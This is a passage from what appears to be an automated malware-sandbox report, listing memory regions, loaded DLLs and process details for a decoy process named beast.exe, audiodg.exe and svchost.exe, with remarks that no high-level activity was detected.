| pagefile_0x00000000028f0000 | 0x028f0000 | 0x029a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000029b0000 | 0x029b0000 | 0x029effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a00000 | 0x02a00000 | 0x02a0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a10000 | 0x02a10000 | 0x02b0ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74610000 | 0x7462cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74630000 | 0x746a4fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f0b0000 | 0x7f0b0000 | 0x7f1affff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f1b0000 | 0x7f1b0000 | 0x7f1d2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f1d4000 | 0x7f1d4000 | 0x7f1d6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f1da000 | 0x7f1da000 | 0x7f1dcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f1dd000 | 0x7f1dd000 | 0x7f1ddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f1df000 | 0x7f1df000 | 0x7f1dffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #89: beast.exe
0
0
| Information | Value |
|---|---|
| ID | #89 |
| File Name | c:\program files (x86)\microsoft.net\beast.exe |
| Command Line | "C:\Program Files (x86)\Microsoft.NET\beast.exe" |
| Initial Working Directory | C:\Program Files (x86)\Microsoft.NET\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc14 |
| Parent PID | 0x57c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D6C
0x
C1C
0x
C18
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x00000000008c0000 | 0x008c0000 | 0x008cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000008d0000 | 0x008d0000 | 0x008d3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008e0000 | 0x008e0000 | 0x008e0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008f0000 | 0x008f0000 | 0x00903fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000910000 | 0x00910000 | 0x0094ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000950000 | 0x00950000 | 0x00a4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000a50000 | 0x00a50000 | 0x00a53fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a60000 | 0x00a60000 | 0x00a60fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000a70000 | 0x00a70000 | 0x00a71fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a80000 | 0x00a80000 | 0x00a8ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00a90000 | 0x00b4dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000b90000 | 0x00b90000 | 0x00b90fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ba0000 | 0x00ba0000 | 0x00ba3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000bb0000 | 0x00bb0000 | 0x00bb4fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000bc0000 | 0x00bc0000 | 0x00bc3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000bd0000 | 0x00bd0000 | 0x00c0ffff | Private Memory | rw |
|
|
|
- |
| beast.exe | 0x00c10000 | 0x00c26fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000c30000 | 0x00c30000 | 0x00ce7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000cf0000 | 0x00cf0000 | 0x00deffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ef0000 | 0x00ef0000 | 0x01077fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001140000 | 0x01140000 | 0x0114ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001150000 | 0x01150000 | 0x012d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000012e0000 | 0x012e0000 | 0x026dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000027b0000 | 0x027b0000 | 0x027bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000027c0000 | 0x027c0000 | 0x028bffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74610000 | 0x7462cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74630000 | 0x746a4fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ea40000 | 0x7ea40000 | 0x7eb3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eb40000 | 0x7eb40000 | 0x7eb62fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eb65000 | 0x7eb65000 | 0x7eb67fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb6b000 | 0x7eb6b000 | 0x7eb6dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb6e000 | 0x7eb6e000 | 0x7eb6efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb6f000 | 0x7eb6f000 | 0x7eb6ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #90: audiodg.exe
0
0
| Information | Value |
|---|---|
| ID | #90 |
| File Name | c:\windows\system32\audiodg.exe |
| Command Line | C:\Windows\system32\AUDIODG.EXE 0x80c |
| Initial Working Directory | C:\Windows |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf10 |
| Parent PID | 0x32c (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F40
0x
F3C
0x
F38
0x
F2C
0x
F28
0x
F24
0x
F1C
0x
F14
0x
828
0x
D70
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000b5744a0000 | 0xb5744a0000 | 0xb5744a6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b5744b0000 | 0xb5744b0000 | 0xb5744bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b5744c0000 | 0xb5744c0000 | 0xb5744d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b5744e0000 | 0xb5744e0000 | 0xb57455ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b574560000 | 0xb574560000 | 0xb574566fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b574570000 | 0xb574570000 | 0xb574571fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b574580000 | 0xb574580000 | 0xb57467ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xb574680000 | 0xb57473dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000b5747c0000 | 0xb5747c0000 | 0xb57483ffff | Private Memory | rw |
|
|
|
- |
| audiodg.exe.mui | 0xb5748c0000 | 0xb5748c0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000b5748d0000 | 0xb5748d0000 | 0xb5748d0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b5748e0000 | 0xb5748e0000 | 0xb5748e0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b5748f0000 | 0xb5748f0000 | 0xb5748f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000b574900000 | 0xb574900000 | 0xb574900fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b574920000 | 0xb574920000 | 0xb57492ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b574930000 | 0xb574930000 | 0xb574b31fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b574b40000 | 0xb574b40000 | 0xb574cc7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000b574cd0000 | 0xb574cd0000 | 0xb574e50fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000b574e60000 | 0xb574e60000 | 0xb574f1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b574f20000 | 0xb574f20000 | 0xb574f9ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0xb574fa0000 | 0xb5752d6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000b5752e0000 | 0xb5752e0000 | 0xb57535ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b575360000 | 0xb575360000 | 0xb5753dffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b575430000 | 0xb575430000 | 0xb575431fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b575440000 | 0xb575440000 | 0xb575641fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b575650000 | 0xb575650000 | 0xb575650fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b575660000 | 0xb575660000 | 0xb575660fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b575670000 | 0xb575670000 | 0xb5756effff | Private Memory | rw |
|
|
|
- |
| private_0x000000b5756f0000 | 0xb5756f0000 | 0xb57576ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b575770000 | 0xb575770000 | 0xb5757effff | Private Memory | rw |
|
|
|
- |
| private_0x000000b575890000 | 0xb575890000 | 0xb57589ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b5758a0000 | 0xb5758a0000 | 0xb5758affff | Private Memory | rw |
|
|
|
- |
| private_0x000000b5758b0000 | 0xb5758b0000 | 0xb5758b1fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b5758c0000 | 0xb5758c0000 | 0xb5758d1fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b575920000 | 0xb575920000 | 0xb575a1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff3e0000 | 0x7df5ff3e0000 | 0x7ff5ff3dffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff795686000 | 0x7ff795686000 | 0x7ff795687fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff795688000 | 0x7ff795688000 | 0x7ff795689fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff79568a000 | 0x7ff79568a000 | 0x7ff79568bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff79568c000 | 0x7ff79568c000 | 0x7ff79568dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff79568e000 | 0x7ff79568e000 | 0x7ff79568ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff795690000 | 0x7ff795690000 | 0x7ff79578ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff795790000 | 0x7ff795790000 | 0x7ff7957b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff7957b4000 | 0x7ff7957b4000 | 0x7ff7957b5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7957b8000 | 0x7ff7957b8000 | 0x7ff7957b9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7957bc000 | 0x7ff7957bc000 | 0x7ff7957bcfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7957be000 | 0x7ff7957be000 | 0x7ff7957bffff | Private Memory | rw |
|
|
|
- |
| audiodg.exe | 0x7ff7965b0000 | 0x7ff79660ffff | Memory Mapped File | rwx |
|
|
|
- |
| audiokse.dll | 0x7ffc3f9a0000 | 0x7ffc3fa07fff | Memory Mapped File | rwx |
|
|
|
- |
| wmalfxgfxdsp.dll | 0x7ffc3fa10000 | 0x7ffc3fbcafff | Memory Mapped File | rwx |
|
|
|
- |
| audioeng.dll | 0x7ffc3fbd0000 | 0x7ffc3fc4dfff | Memory Mapped File | rwx |
|
|
|
- |
| audioses.dll | 0x7ffc41b00000 | 0x7ffc41b84fff | Memory Mapped File | rwx |
|
|
|
- |
| rtworkq.dll | 0x7ffc4fc10000 | 0x7ffc4fc3ffff | Memory Mapped File | rwx |
|
|
|
- |
| mfplat.dll | 0x7ffc4fc40000 | 0x7ffc4fd4bfff | Memory Mapped File | rwx |
|
|
|
- |
| wintypes.dll | 0x7ffc50c00000 | 0x7ffc50d30fff | Memory Mapped File | rwx |
|
|
|
- |
| avrt.dll | 0x7ffc50d80000 | 0x7ffc50d8afff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffc511b0000 | 0x7ffc51332fff | Memory Mapped File | rwx |
|
|
|
- |
| mmdevapi.dll | 0x7ffc51340000 | 0x7ffc513b1fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ffc52ef0000 | 0x7ffc52f16fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc53a90000 | 0x7ffc53ac2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc54210000 | 0x7ffc54226fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffc545a0000 | 0x7ffc545e9fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ffc54620000 | 0x7ffc54663fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc55910000 | 0x7ffc559cdfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ffc57750000 | 0x7ffc57890fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffc57970000 | 0x7ffc57a14fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc57aa0000 | 0x7ffc57b45fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #91: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #91 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k UnistackSvcGroup |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc50 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
5CC
0x
580
0x
9B4
0x
ED8
0x
EA0
0x
36C
0x
C58
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00000087fd6e0000 | 0x87fd6e0000 | 0x87fd6effff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0x87fd6f0000 | 0x87fd6f0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000087fd700000 | 0x87fd700000 | 0x87fd713fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000087fd720000 | 0x87fd720000 | 0x87fd79ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000087fd7a0000 | 0x87fd7a0000 | 0x87fd7a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000087fd7b0000 | 0x87fd7b0000 | 0x87fd7b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000087fd7c0000 | 0x87fd7c0000 | 0x87fd7c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000087fd7d0000 | 0x87fd7d0000 | 0x87fd7d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000087fd7e0000 | 0x87fd7e0000 | 0x87fd7e0fff | Private Memory | rw |
|
|
|
- |
| phoneutilres.dll | 0x87fd7f0000 | 0x87fd7f0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000087fd810000 | 0x87fd810000 | 0x87fd810fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000087fd820000 | 0x87fd820000 | 0x87fd820fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000087fd830000 | 0x87fd830000 | 0x87fd836fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x87fd840000 | 0x87fd8fdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000087fd900000 | 0x87fd900000 | 0x87fd9fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000087fda80000 | 0x87fda80000 | 0x87fdc07fff | Pagefile Backed Memory | r |
|
|
|
- |
| syncres.dll | 0x87fdc10000 | 0x87fdc10fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000087fdc20000 | 0x87fdc20000 | 0x87fdc49fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000087fdc50000 | 0x87fdc50000 | 0x87fdc56fff | Private Memory | rw |
|
|
|
- |
| private_0x00000087fdd00000 | 0x87fdd00000 | 0x87fddfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000087fde00000 | 0x87fde00000 | 0x87fdf80fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000087fdf90000 | 0x87fdf90000 | 0x87ff38ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000087ff390000 | 0x87ff390000 | 0x87ff48ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000087ff490000 | 0x87ff490000 | 0x87ff58ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000087ff590000 | 0x87ff590000 | 0x87ff68ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000087ff690000 | 0x87ff690000 | 0x87ff78ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x87ff790000 | 0x87ffac6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000087ffad0000 | 0x87ffad0000 | 0x87ffbcffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff270000 | 0x7df5ff270000 | 0x7ff5ff26ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff6e0b0e000 | 0x7ff6e0b0e000 | 0x7ff6e0b0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff6e0b10000 | 0x7ff6e0b10000 | 0x7ff6e0c0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6e0c10000 | 0x7ff6e0c10000 | 0x7ff6e0c32fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6e0c33000 | 0x7ff6e0c33000 | 0x7ff6e0c34fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c35000 | 0x7ff6e0c35000 | 0x7ff6e0c36fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c39000 | 0x7ff6e0c39000 | 0x7ff6e0c3afff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c3b000 | 0x7ff6e0c3b000 | 0x7ff6e0c3bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c3e000 | 0x7ff6e0c3e000 | 0x7ff6e0c3ffff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff6e1100000 | 0x7ff6e110cfff | Memory Mapped File | rwx |
|
|
|
- |
| userdatatimeutil.dll | 0x7ffc3e880000 | 0x7ffc3e8a0fff | Memory Mapped File | rwx |
|
|
|
- |
| userdatalanguageutil.dll | 0x7ffc3e8b0000 | 0x7ffc3e8c0fff | Memory Mapped File | rwx |
|
|
|
- |
| accountaccessor.dll | 0x7ffc3e8d0000 | 0x7ffc3e905fff | Memory Mapped File | rwx |
|
|
|
- |
| cemapi.dll | 0x7ffc3e910000 | 0x7ffc3e94ffff | Memory Mapped File | rwx |
|
|
|
- |
| synccontroller.dll | 0x7ffc3e950000 | 0x7ffc3e9bbfff | Memory Mapped File | rwx |
|
|
|
- |
| phoneutil.dll | 0x7ffc3e9c0000 | 0x7ffc3ea00fff | Memory Mapped File | rwx |
|
|
|
- |
| pimstore.dll | 0x7ffc3ea10000 | 0x7ffc3eb80fff | Memory Mapped File | rwx |
|
|
|
- |
| syncutil.dll | 0x7ffc3eb90000 | 0x7ffc3ebd6fff | Memory Mapped File | rwx |
|
|
|
- |
| userdataplatformhelperutil.dll | 0x7ffc3ebe0000 | 0x7ffc3ebf5fff | Memory Mapped File | rwx |
|
|
|
- |
| networkhelper.dll | 0x7ffc3ec00000 | 0x7ffc3ec16fff | Memory Mapped File | rwx |
|
|
|
- |
| aphostservice.dll | 0x7ffc3ec20000 | 0x7ffc3ec6dfff | Memory Mapped File | rwx |
|
|
|
- |
| vaultcli.dll | 0x7ffc46900000 | 0x7ffc46947fff | Memory Mapped File | rwx |
|
|
|
- |
| tokenbroker.dll | 0x7ffc486a0000 | 0x7ffc48765fff | Memory Mapped File | rwx |
|
|
|
- |
| dsclient.dll | 0x7ffc48ed0000 | 0x7ffc48edbfff | Memory Mapped File | rwx |
|
|
|
- |
| userdatatypehelperutil.dll | 0x7ffc48ee0000 | 0x7ffc48ef0fff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x7ffc48ff0000 | 0x7ffc49459fff | Memory Mapped File | rwx |
|
|
|
- |
| aphostclient.dll | 0x7ffc4b080000 | 0x7ffc4b08ffff | Memory Mapped File | rwx |
|
|
|
- |
| esent.dll | 0x7ffc4bc70000 | 0x7ffc4bf51fff | Memory Mapped File | rwx |
|
|
|
- |
| inproclogger.dll | 0x7ffc4ce90000 | 0x7ffc4ce9cfff | Memory Mapped File | rwx |
|
|
|
- |
| idstore.dll | 0x7ffc4cf00000 | 0x7ffc4cf26fff | Memory Mapped File | rwx |
|
|
|
- |
| mccspal.dll | 0x7ffc4cf30000 | 0x7ffc4cf3afff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x7ffc4d9d0000 | 0x7ffc4daa5fff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x7ffc4ddd0000 | 0x7ffc4e145fff | Memory Mapped File | rwx |
|
|
|
- |
| samlib.dll | 0x7ffc50bd0000 | 0x7ffc50bebfff | Memory Mapped File | rwx |
|
|
|
- |
| wintypes.dll | 0x7ffc50c00000 | 0x7ffc50d30fff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x7ffc51cb0000 | 0x7ffc51cc7fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7ffc52640000 | 0x7ffc52652fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7ffc53920000 | 0x7ffc53951fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc53a90000 | 0x7ffc53ac2fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ffc53b80000 | 0x7ffc53b9efff | Memory Mapped File | rwx |
|
|
|
